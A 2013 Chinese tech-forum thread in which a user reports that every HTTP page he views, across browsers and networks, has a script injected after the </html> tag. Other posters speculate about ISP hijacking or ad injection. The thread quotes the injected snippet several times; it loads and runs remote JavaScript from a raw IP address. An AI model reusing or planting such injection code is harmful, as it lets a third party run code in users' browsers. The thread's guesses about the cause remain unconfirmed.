所有网页被插入一段js代码

显示全部楼层 · 发表于 2013-7-5 03:36:13

本帖最后由 zeroten 于 2013-7-5 17:45 编辑

现在的情况：

使用电信和移动的网都有问题，DNS改成8.8.8.8也这样，可以确定不是ISP或DNS问题
目标IP还会变，一开始是122.227.254.195，现在变成了115.238.147.102
虚拟机下ubuntu打开网页也这样
AVG全盘扫描未发现威胁

我用浏览器浏览的所有网页都被插入一段代码。我使用火狐、chrome、IE，查看源文件都会有这样的一段代码，查看源文件发现代码位于</html>标签后：

<script type="text/javascript">(function(){var js = document.createElement("script");js.src="http://122.227.254.195/DB2927DA968D3599D7126C59B2CF6595?id=2&t=8465114&m=698ba867f6795d08"+Math.random();var h = document.getElementsByTagName("head")[0];h.appendChild(js);})()</script>

复制代码

这是我随机打开三个网页后发现的代码：

<script type="text/javascript">(function(){var js = document.createElement("script");js.src="http://122.227.254.195/DB2927DA968D3599D7126C59B2CF6595?id=2&t=8465114&m=698ba867f6795d08"+Math.random();var h = document.getElementsByTagName("head")[0];h.appendChild(js);})()</script>

复制代码

<script type="text/javascript">(function(){var js = document.createElement("script");js.src="http://122.227.254.195/DB2927DA968D3599D7126C59B2CF6595?id=2&t=8521728&m=698ba867f6795d08"+Math.random();var h = document.getElementsByTagName("head")[0];h.appendChild(js);})()</script>

复制代码

<script type="text/javascript">(function(){var js = document.createElement("script");js.src="http://122.227.254.195/DB2927DA968D3599D7126C59B2CF6595?id=2&t=8590528&m=698ba867f6795d08"+Math.random();var h = document.getElementsByTagName("head")[0];h.appendChild(js);})()</script>

复制代码

实在是不知道被什么劫持了，我把dns改成8.8.8.8依然这样

可以看出只有id=2&后面的一串数字不同。

现在我能做的只有把122.227.254.195这个IP加入AVG防火墙的黑名单

--------------------------------------------

用电信手机做热点试了下，还是有这个问题，这样应该排除了是isp的问题吧。

显示全部楼层 · 发表于 2013-7-5 07:46:28

呵呵~~我也遭遇过这事~~但是几小时后自己就好了~我现在还有原始的截图什么的

显示全部楼层 · 发表于 2013-7-5 11:04:43

virusdefender 发表于 2013-7-5 07:46
呵呵~~我也遭遇过这事~~但是几小时后自己就好了~我现在还有原始的截图什么的

我现在还有，真不知道被什么劫持了

显示全部楼层 · 发表于 2013-7-5 11:20:05

地址：日本，

应该不是DNS的原因，

排查本机系统是否有问题

显示全部楼层 · 发表于 2013-7-5 11:23:11

伊川书院发表于 2013-7-5 11:20
地址：日本，

应该不是DNS的原因，

汗，我用几个ip查询网站，查这个IP都是浙江宁波电信

显示全部楼层 · 发表于 2013-7-5 11:24:06

本帖最后由伊川书院于 2013-7-5 11:25 编辑

zeroten 发表于 2013-7-5 11:23
汗，我用几个ip查询网站，查这个IP都是浙江宁波电信

更正：看状态应该还是DNS出问题，或者说ISP出问题，建议投诉。。。。

显示全部楼层 · 发表于 2013-7-5 11:31:05

伊川书院发表于 2013-7-5 11:24
更正：看状态应该还是DNS出问题，或者说ISP出问题，建议投诉。。。。

dns改成8.8.8.8还是这样，isp出问题的话，也不知道他们这么劫持我有什么用，也没有弹广告。

不过我在本机建立一个html网页，打开就没这串代码。

如何能证明是ISP问题呢？我用的是江苏移动，否则投诉他们也不承认

显示全部楼层 · 发表于 2013-7-5 11:49:55

本帖最后由伊川书院于 2013-7-5 11:51 编辑

zeroten 发表于 2013-7-5 11:31
dns改成8.8.8.8还是这样，isp出问题的话，也不知道他们这么劫持我有什么用，也没有弹广告。

这段原本应该是弹窗广告，
不知道为什么目标地址有改动，，造成窗体弹不出来

没有直接证据，，只能说从状态经验来看，应该是ISP在搞鬼

显示全部楼层 · 发表于 2013-7-5 12:11:28

伊川书院发表于 2013-7-5 11:49
这段原本应该是弹窗广告，
不知道为什么目标地址有改动，，造成窗体弹不出来

刚刚发现所有https网页没有被插入代码。

显示全部楼层 · 发表于 2013-7-5 12:29:23

伊川书院发表于 2013-7-5 11:20
地址：日本，

应该不是DNS的原因，

用电信手机做热点试了下，还是有这个问题，这样应该排除了是isp的问题吧。

[网络] 所有网页被插入一段js代码

本帖子中包含更多资源

本帖子中包含更多资源